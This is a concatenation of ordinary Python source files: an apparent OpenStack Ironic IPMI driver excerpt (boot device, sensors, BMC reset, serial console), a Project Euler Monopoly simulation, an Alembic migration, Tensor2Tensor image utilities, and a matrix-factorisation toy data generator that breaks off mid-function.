        :returns: a dictionary containing:

            :boot_device: the boot device, one of
                :mod:`ironic.common.boot_devices` or None if it is unknown.
            :persistent: Whether the boot device will persist to all
                future boots or not, None if it is unknown.

        """
        cmd = "chassis bootparam get 5"
        driver_info = _parse_driver_info(task.node)
        response = {'boot_device': None, 'persistent': None}
        try:
            out, err = _exec_ipmitool(driver_info, cmd)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            LOG.warning(_LW('IPMI get boot device failed for node %(node)s '
                            'when executing "ipmitool %(cmd)s". '
                            'Error: %(error)s'),
                        {'node': driver_info['uuid'], 'cmd': cmd, 'error': e})
            raise exception.IPMIFailure(cmd=cmd)

        # Parse the "Boot Device Selector : <value>" line from the bootparam
        # output. groups('') substitutes '' for an empty optional capture, so
        # boot_selector is always a string.
        re_obj = re.search('Boot Device Selector : (.+)?\n', out)
        if re_obj:
            boot_selector = re_obj.groups('')[0]
            if 'PXE' in boot_selector:
                response['boot_device'] = boot_devices.PXE
            elif 'Hard-Drive' in boot_selector:
                if 'Safe-Mode' in boot_selector:
                    response['boot_device'] = boot_devices.SAFE
                else:
                    response['boot_device'] = boot_devices.DISK
            elif 'BIOS' in boot_selector:
                response['boot_device'] = boot_devices.BIOS
            elif 'CD/DVD' in boot_selector:
                response['boot_device'] = boot_devices.CDROM

        # Any selector text not matched above leaves boot_device as None.
        response['persistent'] = 'Options apply to all future boots' in out
        return response

    def get_sensors_data(self, task):
        """Get sensors data.

        :param task: a TaskManager instance.
        :raises: FailedToGetSensorData when getting the sensor data fails.
        :raises: FailedToParseSensorData when parsing sensor data fails.
        :raises: InvalidParameterValue if required ipmi parameters are missing
        :raises: MissingParameterValue if a required parameter is missing.
        :returns: returns a dict of sensor data group by sensor type.

        """
        driver_info = _parse_driver_info(task.node)
        # with '-v' option, we can get the entire sensor data including the
        # extended sensor informations
        cmd = "sdr -v"
        try:
            out, err = _exec_ipmitool(driver_info, cmd)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            raise exception.FailedToGetSensorData(node=task.node.uuid,
                                                  error=e)

        return _parse_ipmi_sensors_data(task.node, out)


class VendorPassthru(base.VendorInterface):
    """Vendor passthru interface exposing raw-IPMI and BMC-reset actions."""

    def __init__(self):
        try:
            _check_option_support(['single_bridge', 'dual_bridge'])
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    # Exposed as a vendor passthru HTTP POST endpoint; delegates to the
    # module-level send_raw() helper.
    @base.passthru(['POST'])
    @task_manager.require_exclusive_lock
    def send_raw(self, task, http_method, raw_bytes):
        """Send raw bytes to the BMC. Bytes should be a string of bytes.

        :param task: a TaskManager instance.
        :param http_method: the HTTP method used on the request.
        :param raw_bytes: a string of raw bytes to send, e.g. '0x00 0x01'
        :raises: IPMIFailure on an error from ipmitool.
        :raises: MissingParameterValue if a required parameter is missing.
        :raises:  InvalidParameterValue when an invalid value is specified.

        """
        send_raw(task, raw_bytes)

    @base.passthru(['POST'])
    @task_manager.require_exclusive_lock
    def bmc_reset(self, task, http_method, warm=True):
        """Reset BMC with IPMI command 'bmc reset (warm|cold)'.

        :param task: a TaskManager instance.
        :param http_method: the HTTP method used on the request.
        :param warm: boolean parameter to decide on warm or cold reset.
        :raises: IPMIFailure on an error from ipmitool.
        :raises: MissingParameterValue if a required parameter is missing.
        :raises: InvalidParameterValue when an invalid value is specified

        """
        node_uuid = task.node.uuid

        if warm:
            warm_param = 'warm'
        else:
            warm_param = 'cold'

        LOG.debug('Doing %(warm)s BMC reset on node %(node)s',
                  {'warm': warm_param, 'node': node_uuid})
        driver_info = _parse_driver_info(task.node)
        cmd = 'bmc reset %s' % warm_param

        try:
            out, err = _exec_ipmitool(driver_info, cmd)
            LOG.debug('bmc reset returned stdout: %(stdout)s, stderr:'
                      ' %(stderr)s', {'stdout': out, 'stderr': err})
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            LOG.exception(_LE('IPMI "bmc reset" failed for node %(node_id)s '
                          'with error: %(error)s.'),
                          {'node_id': node_uuid, 'error': e})
            raise exception.IPMIFailure(cmd=cmd)

    def get_properties(self):
        return COMMON_PROPERTIES

    def validate(self, task, method, **kwargs):
        """Validate vendor-specific actions.

        If invalid, raises an exception; otherwise returns None.

        Valid methods:
          * send_raw
          * bmc_reset

        :param task: a task from TaskManager.
        :param method: method to be validated
        :param kwargs: info for action.
        :raises: InvalidParameterValue when an invalid parameter value is
                 specified.
        :raises: MissingParameterValue if a required parameter is missing.

        """
        if method == 'send_raw':
            if not kwargs.get('raw_bytes'):
                raise exception.MissingParameterValue(_(
                    'Parameter raw_bytes (string of bytes) was not '
                    'specified.'))

        # All methods additionally require valid IPMI credentials.
        _parse_driver_info(task.node)


class IPMIShellinaboxConsole(base.ConsoleInterface):
    """A ConsoleInterface that uses ipmitool and shellinabox."""

    def __init__(self):
        try:
            _check_option_support(['timing', 'single_bridge', 'dual_bridge'])
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    def get_properties(self):
        # Console support requires the extra CONSOLE_PROPERTIES (e.g. the
        # terminal port) on top of the common IPMI credentials.
        d = COMMON_PROPERTIES.copy()
        d.update(CONSOLE_PROPERTIES)
        return d

    def validate(self, task):
        """Validate the Node console info.

        :param task: a task from TaskManager.
        :raises: InvalidParameterValue
        :raises: MissingParameterValue when a required parameter is missing

        """
        driver_info = _parse_driver_info(task.node)
        if not driver_info['port']:
            raise exception.MissingParameterValue(_(
                "Missing 'ipmi_terminal_port' parameter in node's"
                " driver_info."))

        if driver_info['protocol_version'] != '2.0':
            raise exception.InvalidParameterValue(_(
                "Serial over lan only works with IPMI protocol version 2.0. "
                "Check the 'ipmi_protocol_version' parameter in "
                "node's driver_info"))

    def start_console(self, task):
        """Start a remote console for the node.

        :param task: a task from TaskManager
        :raises: InvalidParameterValue if required ipmi parameters are missing
        :raises: PasswordFileFailedToCreate if unable to create a file
                 containing the password
        :raises: ConsoleError if the directory for the PID file cannot be
                 created
        :raises: ConsoleSubprocessFailed when invoking the subprocess failed
        """
        driver_info = _parse_driver_info(task.node)

        # The password is passed to ipmitool via a persistent file (-f) so it
        # never appears on the command line.
        path = _console_pwfile_path(driver_info['uuid'])
        pw_file = console_utils.make_persistent_password_file(
            path, driver_info['password'])

        # Command string in the "/:<uid>:<gid>:<dir>:<cmd>" form consumed by
        # console_utils.start_shellinabox_console.
        ipmi_cmd = ("/:%(uid)s:%(gid)s:HOME:ipmitool -H %(address)s"
                    " -I lanplus -U %(user)s -f %(pwfile)s"
                    % {'uid': os.getuid(),
                       'gid': os.getgid(),
                       'address': driver_info['address'],
                       'user': driver_info['username'],
                       'pwfile': pw_file})

        # Append any configured bridging options (single/dual bridge).
        for name, option in BRIDGING_OPTIONS:
            if driver_info[name] is not None:
                ipmi_cmd = " ".join([ipmi_cmd,
                                     option, driver_info[name]])

        if CONF.debug:
            ipmi_cmd += " -v"
        ipmi_cmd += " sol activate"
        try:
            console_utils.start_shellinabox_console(driver_info['uuid'],
                                                    driver_info['port'],
                                                    ipmi_cmd)
        except (exception.ConsoleError, exception.ConsoleSubprocessFailed):
            # Don't leave the password file behind if the console failed.
            with excutils.save_and_reraise_exception():
                utils.unlink_without_raise(path)

    def stop_console(self, task):
        """Stop the remote console session for the node.

        :param task: a task from TaskManager
        :raises: InvalidParameterValue if required ipmi parameters are missing
        :raises: ConsoleError if unable to stop the console
        """
        driver_info = _parse_driver_info(task.node)
        try:
            console_utils.stop_shellinabox_console(driver_info['uuid'])
        finally:
            # Always remove the persistent password file, even on failure.
            utils.unlink_without_raise(
                _console_pwfile_path(driver_info['uuid']))

    def get_console(self, task):
        """Get the type and connection information about the console."""
        driver_info = _parse_driver_info(task.node)
        url = console_utils.get_shellinabox_console_url(driver_info['port'])
        return {'type': 'shellinabox', 'url': url}

#!/usr/bin/env python

from random import choice

from python.decorators import euler_timer

# Monopoly board for Project Euler problem 84, in board order:
# GO, Community Chest (CC), Chance (CH), railways (R), utilities (U),
# JAIL, Free Parking (FP) and Go To Jail (G2J); other entries are
# property squares.
SQUARES = ["GO",
           "A1", "CC1", "A2", "T1", "R1", "B1", "CH1", "B2", "B3",
           "JAIL",
           "C1", "U1", "C2", "C3", "R2", "D1", "CC2", "D2", "D3",
           "FP",
           "E1", "CH2", "E2", "E3", "R3", "F1", "F2", "U2", "F3",
           "G2J",
           "G1", "G2", "CC3", "G3", "R4", "CH3", "H1", "T2", "H2"]


def roll_die(size):
    """Roll two fair dice with `size` faces each.

    Returns a (total, is_double) tuple, where is_double is True when
    both dice show the same value.
    """
    faces = range(1, size + 1)
    first = choice(faces)
    second = choice(faces)
    return (first + second, first == second)


def back(square, step):
    """Return the square `step` positions behind `square`, wrapping past GO."""
    position = SQUARES.index(square)
    return SQUARES[(position - step) % len(SQUARES)]


def next_specific(square, next_type):
    """Return the next railway ("R") or utility ("U") square after `square`.

    Board positions used: R1=5, R2=15, R3=25, R4=35; U1=12, U2=28.

    :param square: current square name (must be present in SQUARES).
    :param next_type: "R" for the next railway, "U" for the next utility.
    :returns: the name of the next square of the requested type.
    :raises: Exception for an unsupported next_type, or when `square` is
        itself a square of the requested type (those indexes fall through
        every range check).
    """
    if next_type not in ["R", "U"]:
        raise Exception("next_specific only intended for R and U")

    # R1=5, R2=15, R3=25, R4=35
    index = SQUARES.index(square)
    if next_type == "R":
        if 0 <= index < 5 or 35 < index:
            return "R1"
        elif 5 < index < 15:
            return "R2"
        elif 15 < index < 25:
            return "R3"
        elif 25 < index < 35:
            return "R4"
        else:
            raise Exception("Case should not occur")
    # U1=12, U2=28
    elif next_type == "U":
        if 0 <= index < 12 or index > 28:
            return "U1"
        elif 12 < index < 28:
            return "U2"
        else:
            # BUG FIX: this branch previously *returned* the Exception
            # instance instead of raising it, silently handing callers an
            # Exception object (reachable when index is exactly 12 or 28,
            # i.e. square is U1 or U2). Now raises, matching the "R" branch.
            raise Exception("Case should not occur")
    else:
        raise Exception("Case should not occur")


def next_square(landing_square, chance_card, chest_card):
    """Resolve card/Go-To-Jail effects for the square just landed on.

    Cards are modeled as fixed 16-card cycles (indexes advance modulo 16)
    rather than shuffled decks.

    :param landing_square: board square name the player landed on.
    :param chance_card: index (0-15) of the next Chance card in the cycle.
    :param chest_card: index (0-15) of the next Community Chest card.
    :returns: tuple of (final square, updated chance index, updated
        chest index).
    """
    # Ordinary squares have no movement effect.
    if landing_square not in ["CC1", "CC2", "CC3", "CH1", "CH2", "CH3", "G2J"]:
        return (landing_square, chance_card, chest_card)

    if landing_square == "G2J":
        return ("JAIL", chance_card, chest_card)
    elif landing_square in ["CC1", "CC2", "CC3"]:
        # 1/16 Go, Jail
        # 14/16 Stay
        chest_card = (chest_card + 1) % 16
        if chest_card == 0:
            return ("GO", chance_card, chest_card)
        elif chest_card == 1:
            return ("JAIL", chance_card, chest_card)
        else:
            return (landing_square, chance_card, chest_card)
    elif landing_square in ["CH1", "CH2", "CH3"]:
        # 1/16 Go, Jail, C1, E3, H2, R1, next U, back 3
        # 1/8 Next R
        chance_card = (chance_card + 1) % 16
        if chance_card == 0:
            return ("GO", chance_card, chest_card)
        elif chance_card == 1:
            return ("JAIL", chance_card, chest_card)
        elif chance_card == 2:
            return ("C1", chance_card, chest_card)
        elif chance_card == 3:
            return ("E3", chance_card, chest_card)
        elif chance_card == 4:
            return ("H2", chance_card, chest_card)
        elif chance_card == 5:
            return ("R1", chance_card, chest_card)
        elif chance_card == 6:
            return (next_specific(landing_square, "U"),
                    chance_card, chest_card)
        elif chance_card == 7:
            # "Go back 3 squares" can land on another card square, so the
            # effect is resolved recursively.
            return next_square(back(landing_square, 3),
                               chance_card, chest_card)
        elif chance_card in [8, 9]:
            return (next_specific(landing_square, "R"),
                    chance_card, chest_card)
        else:
            return (landing_square, chance_card, chest_card)
    else:
        raise Exception("Case should not occur")


def main(verbose=False):
    """Simulate Monopoly moves and return the three most-visited squares.

    Runs 10**6 turns with two 4-sided dice, counting visits per square,
    and returns the board indexes of the top three squares concatenated
    as a six-character string (each index zero-padded to two digits).

    :param verbose: accepted by the caller's interface; currently unused.
    """
    GAME_PLAY = 10 ** 6
    dice_size = 4
    visited = {"GO": 1}
    current = "GO"
    chance_card = 0
    chest_card = 0
    doubles = 0
    # NOTE: xrange makes this module Python 2 only.
    for place in xrange(GAME_PLAY):
        total, double = roll_die(dice_size)
        if double:
            doubles += 1
        else:
            doubles = 0

        # Three consecutive doubles sends the player straight to jail
        # instead of moving.
        if doubles == 3:
            doubles = 0
            current = "JAIL"
        else:
            index = SQUARES.index(current)
            landing_square = SQUARES[(index + total) % len(SQUARES)]
            (current, chance_card,
             chest_card) = next_square(landing_square, chance_card, chest_card)

        # if current is not in visited, sets to 1
        # (default 0 returned by get)
        visited[current] = visited.get(current, 0) + 1

    # Sort squares by visit count, descending, and keep the top three.
    top_visited = sorted(visited.items(),
                         key=lambda pair: pair[1],
                         reverse=True)
    top_visited = [SQUARES.index(square[0]) for square in top_visited[:3]]

    return ''.join(str(index).zfill(2) for index in top_visited)

# Script entry point (Python 2 print statement): time the simulation with
# the project's euler_timer decorator for problem 84.
if __name__ == '__main__':
    print euler_timer(84)(main)(verbose=True)

# Copyright 2022 OpenStack Foundation
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
#

"""add tenant_id to lcm_subscriptions and lcm_op_occs

Revision ID: d6ae359ab0d6
Revises: 3ff50553e9d3
Create Date: 2022-01-06 13:35:53.868106

"""

from alembic import op
import sqlalchemy as sa

# revision identifiers, used by Alembic.
revision = 'd6ae359ab0d6'
down_revision = '3ff50553e9d3'


def upgrade(active_plugins=None, options=None):
    """Add a tenant_id column to vnf_lcm_subscriptions and vnf_lcm_op_occs.

    NOTE(review): the column is NOT NULL with no server_default, which
    fails on most backends if either table already contains rows --
    confirm the tables are empty (or add a server_default) before running
    this against production data.
    """
    op.add_column('vnf_lcm_subscriptions',
                  sa.Column('tenant_id', sa.String(length=64),
                  nullable=False))

    op.add_column('vnf_lcm_op_occs',
                  sa.Column('tenant_id', sa.String(length=64),
                  nullable=False))

# coding=utf-8
# Copyright 2022 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Base classes and utilities for image datasets."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function


import io
import os
import numpy as np
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import modalities
from tensor2tensor.utils import contrib
from tensor2tensor.utils import metrics

import tensorflow.compat.v1 as tf


def matplotlib_pyplot():
  """Import and return matplotlib.pyplot using the headless "agg" backend.

  The backend must be selected before pyplot is imported, which is why both
  imports are deferred to call time instead of module import time.
  """
  import matplotlib  # pylint: disable=g-import-not-at-top
  matplotlib.use("agg")
  import matplotlib.pyplot as plt  # pylint: disable=g-import-not-at-top
  return plt


def image_to_tf_summary_value(image, tag):
  """Converts a NumPy image to a tf.Summary.Value object.

  Args:
    image: 3-D NumPy array (height, width, channels), values cast to uint8.
    tag: name for tf.Summary.Value for display in tensorboard.
  Returns:
    image_summary: A tf.Summary.Value object.
  """
  curr_image = np.asarray(image, dtype=np.uint8)
  height, width, n_channels = curr_image.shape
  # If monochrome image, then reshape to [height, width]
  if n_channels == 1:
    curr_image = np.reshape(curr_image, [height, width])
  # Render through matplotlib's imsave to obtain PNG-encoded bytes.
  s = io.BytesIO()
  matplotlib_pyplot().imsave(s, curr_image, format="png")
  img_sum = tf.Summary.Image(encoded_image_string=s.getvalue(),
                             height=height, width=width,
                             colorspace=n_channels)
  return tf.Summary.Value(tag=tag, image=img_sum)


def convert_predictions_to_image_summaries(hook_args):
  """Optionally converts images from hooks_args to image summaries.

  Args:
    hook_args: DecodeHookArgs namedtuple.
  Returns:
    summaries: list of tf.Summary values, or an empty list when
      hook_args.decode_hparams.display_decoded_images is False.
  """
  decode_hparams = hook_args.decode_hparams
  if not decode_hparams.display_decoded_images:
    return []
  predictions = hook_args.predictions[0]

  # Display ten random inputs and outputs so that tensorboard does not hang.
  # NOTE(review): np.random.choice samples with replacement here, so the ten
  # displayed predictions may contain duplicates -- confirm that is intended.
  all_summaries = []
  rand_predictions = np.random.choice(predictions, size=10)
  for ind, prediction in enumerate(rand_predictions):
    output_summary = image_to_tf_summary_value(
        prediction["outputs"], tag="%d_output" % ind)
    input_summary = image_to_tf_summary_value(
        prediction["inputs"], tag="%d_input" % ind)
    all_summaries.append(input_summary)
    all_summaries.append(output_summary)
  return all_summaries


def resize_by_area(img, size):
  """Resize `img` to size x size using AREA interpolation, cast to int64."""
  resized = tf.image.resize_images(img, [size, size],
                                   tf.image.ResizeMethod.AREA)
  return tf.to_int64(resized)


def make_multiscale(image, resolutions,
                    resize_method=tf.image.ResizeMethod.BICUBIC,
                    num_channels=3):
  """Returns list of scaled images, one for each resolution.

  Args:
    image: Tensor of shape [height, height, num_channels].
    resolutions: List of heights that image's height is resized to.
    resize_method: tf.image.ResizeMethod.
    num_channels: Number of channels in image.

  Returns:
    List of Tensors, one for each resolution with shape given by
    [resolutions[i], resolutions[i], num_channels].
  """
  def _rescale(side):
    # Square resize: the image is assumed to have height == width.
    scaled = tf.image.resize_images(image,
                                    size=[side, side],
                                    method=resize_method)
    scaled = tf.to_int64(scaled)
    scaled.set_shape([side, side, num_channels])
    return scaled

  return [_rescale(side) for side in resolutions]


def make_multiscale_dilated(image, resolutions, num_channels=3):
  """Returns list of scaled images, one for each resolution.

  Resizes by skipping every nth pixel.

  Args:
    image: Tensor of shape [height, height, num_channels].
    resolutions: List of heights that image's height is resized to. The function
      assumes VALID padding, so the original image's height must be divisible
      by each resolution's height to return the exact resolution size.
    num_channels: Number of channels in image.

  Returns:
    List of Tensors, one for each resolution with shape given by
    [resolutions[i], resolutions[i], num_channels] if resolutions properly
    divide the original image's height; otherwise shape height and width is up
    to valid skips.
  """
  image_height = common_layers.shape_list(image)[0]
  scaled_images = []
  for height in resolutions:
    # Downscale by striding: keep every dilation_rate-th pixel in both
    # spatial dimensions (integer division, so inexact divisors give a
    # slightly different output size).
    dilation_rate = image_height // height  # assuming height = width
    scaled_image = image[::dilation_rate, ::dilation_rate]
    scaled_image = tf.to_int64(scaled_image)
    # Static spatial dims are unknown after strided slicing; only the
    # channel count is pinned.
    scaled_image.set_shape([None, None, num_channels])
    scaled_images.append(scaled_image)
  return scaled_images


class ImageProblem(problem.Problem):
  """Base class for problems whose inputs are encoded images."""

  @property
  def num_channels(self):
    """Number of color channels."""
    return 3

  @property
  def vocab_size(self):
    """Number of pixel values."""
    return 256

  def example_reading_spec(self):
    """Feature specs for decoding serialized image examples."""
    data_fields = {}
    data_fields["image/encoded"] = tf.FixedLenFeature((), tf.string)
    data_fields["image/format"] = tf.FixedLenFeature((), tf.string)

    image_decoder = contrib.slim().tfexample_decoder.Image(
        image_key="image/encoded",
        format_key="image/format",
        channels=self.num_channels)
    data_items_to_decoders = {"inputs": image_decoder}

    return data_fields, data_items_to_decoders

  def preprocess_example(self, example, mode, hparams):
    """Standardize pixel values, unless the problem was reversed."""
    if self._was_reversed:
      return example
    example["inputs"] = tf.image.per_image_standardization(example["inputs"])
    return example

  def eval_metrics(self):
    """Accuracy metrics, plus image summaries for reversed problems."""
    eval_metrics = [
        metrics.Metrics.ACC, metrics.Metrics.ACC_TOP5,
        metrics.Metrics.ACC_PER_SEQ, metrics.Metrics.NEG_LOG_PERPLEXITY
    ]
    if self._was_reversed:
      eval_metrics.append(metrics.Metrics.IMAGE_SUMMARY)
    return eval_metrics

  @property
  def decode_hooks(self):
    return [convert_predictions_to_image_summaries]


class Image2ClassProblem(ImageProblem):
  """Base class for single-label image classification problems."""

  @property
  def is_small(self):
    raise NotImplementedError()

  @property
  def num_classes(self):
    raise NotImplementedError()

  @property
  def train_shards(self):
    raise NotImplementedError()

  @property
  def dev_shards(self):
    """Number of shards for the dev split."""
    return 1

  @property
  def class_labels(self):
    """Default human-readable names for the class ids."""
    return ["ID_%d" % i for i in range(self.num_classes)]

  def feature_encoders(self, data_dir):
    """Encoders for image inputs and class-label targets."""
    del data_dir  # Unused.
    return {
        "inputs": text_encoder.ImageEncoder(channels=self.num_channels),
        "targets": text_encoder.ClassLabelEncoder(self.class_labels),
    }

  def generator(self, data_dir, tmp_dir, is_training):
    raise NotImplementedError()

  def example_reading_spec(self):
    """Extend the base image spec with a scalar class-label field."""
    data_fields, data_items_to_decoders = (
        super(Image2ClassProblem, self).example_reading_spec())
    data_fields["image/class/label"] = tf.FixedLenFeature((1,), tf.int64)
    data_items_to_decoders["targets"] = (
        contrib.slim().tfexample_decoder.Tensor("image/class/label"))
    return data_fields, data_items_to_decoders

  def hparams(self, defaults, unused_model_hparams):
    """Configure modalities, vocab sizes and loss/batch multipliers."""
    p = defaults
    p.modality = {
        "inputs": modalities.ModalityType.IMAGE,
        "targets": modalities.ModalityType.CLASS_LABEL,
    }
    p.vocab_size = {"inputs": 256, "targets": self.num_classes}
    if self.is_small:
      p.batch_size_multiplier = 4
      p.loss_multiplier = 3.0
    else:
      p.batch_size_multiplier = 256
      p.loss_multiplier = 1.0
    if self._was_reversed:
      p.loss_multiplier = 1.0
    p.input_space_id = problem.SpaceID.IMAGE
    p.target_space_id = problem.SpaceID.IMAGE_LABEL

  def generate_data(self, data_dir, tmp_dir, task_id=-1):
    """Generate, shuffle and write the train and dev splits."""
    train_paths = self.training_filepaths(
        data_dir, self.train_shards, shuffled=False)
    dev_paths = self.dev_filepaths(data_dir, self.dev_shards, shuffled=False)
    generator_utils.generate_dataset_and_shuffle(
        self.generator(data_dir, tmp_dir, True), train_paths,
        self.generator(data_dir, tmp_dir, False), dev_paths)


def encode_images_as_png(images):
  """Lazily yield each image in `images` as a PNG-encoded byte string."""
  if tf.executing_eagerly():
    for image in images:
      yield tf.image.encode_png(image).numpy()
    return
  # Graph mode: build one placeholder/encode op and reuse it for every image.
  height, width, channels = images[0].shape
  with tf.Graph().as_default():
    image_ph = tf.placeholder(dtype=tf.uint8, shape=(height, width, channels))
    encode_op = tf.image.encode_png(image_ph)
    with tf.Session() as sess:
      for image in images:
        yield sess.run(encode_op, feed_dict={image_ph: image})


def image_generator(images, labels):
  """Generator for images that takes image and labels lists and creates pngs.

  Args:
    images: list of images given as [width x height x channels] numpy arrays.
    labels: list of ints, same length as images.

  Yields:
    A dictionary representing the images with the following fields:
    * image/encoded: the string encoding the image as PNG,
    * image/format: the string "png" representing image format,
    * image/class/label: an integer representing the label,
    * image/height: an integer representing the height,
    * image/width: an integer representing the width.
    Every field is actually a singleton list of the corresponding type.

  Raises:
    ValueError: if images is an empty list.
  """
  if not images:
    raise ValueError("Must provide some images for the generator.")
  # NOTE(review): numpy image arrays are conventionally (height, width,
  # channels); the (width, height) unpack below follows the docstring's
  # stated layout, but confirm it for non-square images.
  width, height, _ = images[0].shape
  for encoded_image, label in zip(encode_images_as_png(images), labels):
    yield {
        "image/encoded": [encoded_image],
        "image/format": ["png"],
        "image/class/label": [int(label)],
        "image/height": [height],
        "image/width": [width],
    }


class Image2TextProblem(ImageProblem):
  """Base class for problems mapping an image to a text transcription."""

  @property
  def is_character_level(self):
    raise NotImplementedError()

  @property
  def vocab_problem(self):
    """Problem supplying the subword vocab; unused at character level."""
    raise NotImplementedError()  # Not needed if self.is_character_level.

  @property
  def target_space_id(self):
    raise NotImplementedError()

  @property
  def train_shards(self):
    raise NotImplementedError()

  @property
  def dev_shards(self):
    raise NotImplementedError()

  def generator(self, data_dir, tmp_dir, is_training):
    raise NotImplementedError()

  def example_reading_spec(self):
    """Extend the base image spec with a variable-length label field."""
    data_fields, data_items_to_decoders = (
        super(Image2TextProblem, self).example_reading_spec())
    data_fields["image/class/label"] = tf.VarLenFeature(tf.int64)
    data_items_to_decoders["targets"] = (
        contrib.slim().tfexample_decoder.Tensor("image/class/label"))
    return data_fields, data_items_to_decoders

  def feature_encoders(self, data_dir):
    """Image input encoder plus a byte-level or subword target encoder."""
    if self.is_character_level:
      target_encoder = text_encoder.ByteTextEncoder()
    else:
      vocab_path = os.path.join(data_dir, self.vocab_problem.vocab_filename)
      target_encoder = text_encoder.SubwordTextEncoder(vocab_path)
    return {
        "inputs": text_encoder.ImageEncoder(channels=self.num_channels),
        "targets": target_encoder,
    }

  def hparams(self, defaults, unused_model_hparams):
    """Configure modalities, vocab sizes and multipliers for image-to-text."""
    p = defaults
    p.modality = {
        "inputs": modalities.ModalityType.IMAGE,
        "targets": modalities.ModalityType.SYMBOL,
    }
    p.vocab_size = {
        "inputs": 256,
        "targets": self._encoders["targets"].vocab_size,
    }
    p.batch_size_multiplier = 256
    p.loss_multiplier = 1.0
    p.input_space_id = problem.SpaceID.IMAGE
    p.target_space_id = self.target_space_id

  def generate_data(self, data_dir, tmp_dir, task_id=-1):
    """Generate, shuffle and write the train and dev splits."""
    generator_utils.generate_dataset_and_shuffle(
        self.generator(data_dir, tmp_dir, True),
        self.training_filepaths(data_dir, self.train_shards, shuffled=False),
        self.generator(data_dir, tmp_dir, False),
        self.dev_filepaths(data_dir, self.dev_shards, shuffled=False))


def image_augmentation(images, do_colors=False, crop_size=None):
  """Image augmentation: cropping, flipping, and color transforms."""
  target_size = [299, 299] if crop_size is None else crop_size
  images = tf.random_crop(images, target_size + [3])
  images = tf.image.random_flip_left_right(images)
  if not do_colors:
    return images
  # Extra color jitter; might be slow.
  images = tf.image.random_brightness(images, max_delta=32. / 255.)
  images = tf.image.random_saturation(images, lower=0.5, upper=1.5)
  images = tf.image.random_hue(images, max_delta=0.2)
  images = tf.image.random_contrast(images, lower=0.5, upper=1.5)
  return images


def cifar_image_augmentation(images):
  """Image augmentation suitable for CIFAR-10/100.

  As described in https://arxiv.org/pdf/1608.06993v3.pdf (page 5): pad to
  40x40, take a random 32x32 crop, then apply a random horizontal flip.

  Args:
    images: a Tensor.
  Returns:
    Tensor of the same shape as images.
  """
  padded = tf.image.resize_image_with_crop_or_pad(images, 40, 40)
  cropped = tf.random_crop(padded, [32, 32, 3])
  return tf.image.random_flip_left_right(cropped)


def random_shift(image, wsr=0.1, hsr=0.1):
  """Apply random horizontal and vertical shift to images.

  This is the default data-augmentation strategy used on CIFAR in Glow.

  Args:
    image: a 3-D Tensor
    wsr: Width shift range, as a float fraction of the width.
    hsr: Height shift range, as a float fraction of the height.
  Returns:
    images: images translated by the provided wsr and hsr.
  """
  height, width, _ = common_layers.shape_list(image)
  width_range, height_range = wsr*width, hsr*height
  height_translations = tf.random_uniform((1,), -height_range, height_range)
  width_translations = tf.random_uniform((1,), -width_range, width_range)
  # NOTE(review): contrib.image().translate documents translations as
  # [dx, dy] (horizontal component first), but the height shift is
  # concatenated first here. For square inputs with wsr == hsr the two
  # orderings are statistically indistinguishable — confirm before using
  # on non-square images or asymmetric shift ranges.
  translations = tf.concat((height_translations, width_translations), axis=0)
  return contrib.image().translate(image, translations=translations)

"""
Generate a toy dataset for the matrix factorisation case, and store it.

We use dimensions 100 by 50 for the dataset, and 10 latent factors.

As the prior for U and V we take rate 1 for all entries (i.e. an Exponential(1) prior).

As a result, each value in R has a value of around 20, and a variance of 100-120.

For contrast, the Sanger dataset of 705 by 140 shifted to nonnegative has mean 
31.522999753779082 and variance 243.2427345740027.

We add Gaussian noise of precision tau = 1 (prior for gamma: alpha=1,beta=1).
(Simply using the expectation of our Gamma distribution over tau)
"""

import sys, os
project_location = os.path.dirname(__file__)+"/../../../"
sys.path.append(project_location)

from BNMTF.code.models.distributions.exponential import exponential_draw
from BNMTF.code.models.distributions.normal import normal_draw
from BNMTF.code.cross_validation.mask import generate_M

import numpy, itertools, matplotlib.pyplot as plt

def generate_dataset(I,J,K,lambdaU,lambdaV,tau):
    """Draw U (I x K) and V (J x K) from Exponential priors, form the
    noise-free product R = U V^T, and add Gaussian noise of precision tau.

    Returns (U, V, tau, true_R, R)."""
    U = numpy.zeros((I,K))
    V = numpy.zeros((J,K))
    # Sample each entry independently from its Exponential prior, row-major.
    for i in range(I):
        for k in range(K):
            U[i,k] = exponential_draw(lambdaU[i,k])
    for j in range(J):
        for k in range(K):
            V[j,k] = exponential_draw(lambdaV[j,k])
    true_R = numpy.dot(U, V.T)
    R = add_noise(true_R, tau)
    return (U,V,tau,true_R,R)
    
def add_noise(true_R,tau):
    """Return a copy of true_R with Gaussian noise of precision tau added
    to every entry; an infinite precision means no noise at all."""
    if numpy.isinf(tau):
        return numpy.copy(true_R)
    rows, cols = true_R.shape
    noisy = numpy.zeros((rows, cols))
    for r in range(rows):
        for c in range(cols):
            noisy[r,c] = normal_draw(true_R[r,c], tau)
    return noisy
    
def try_generate_M(I,J,fraction_unknown,attempts):
    for attempt in range(1,attempts+1):
        try:
            M = generate_M(I,J,fraction_unknown)
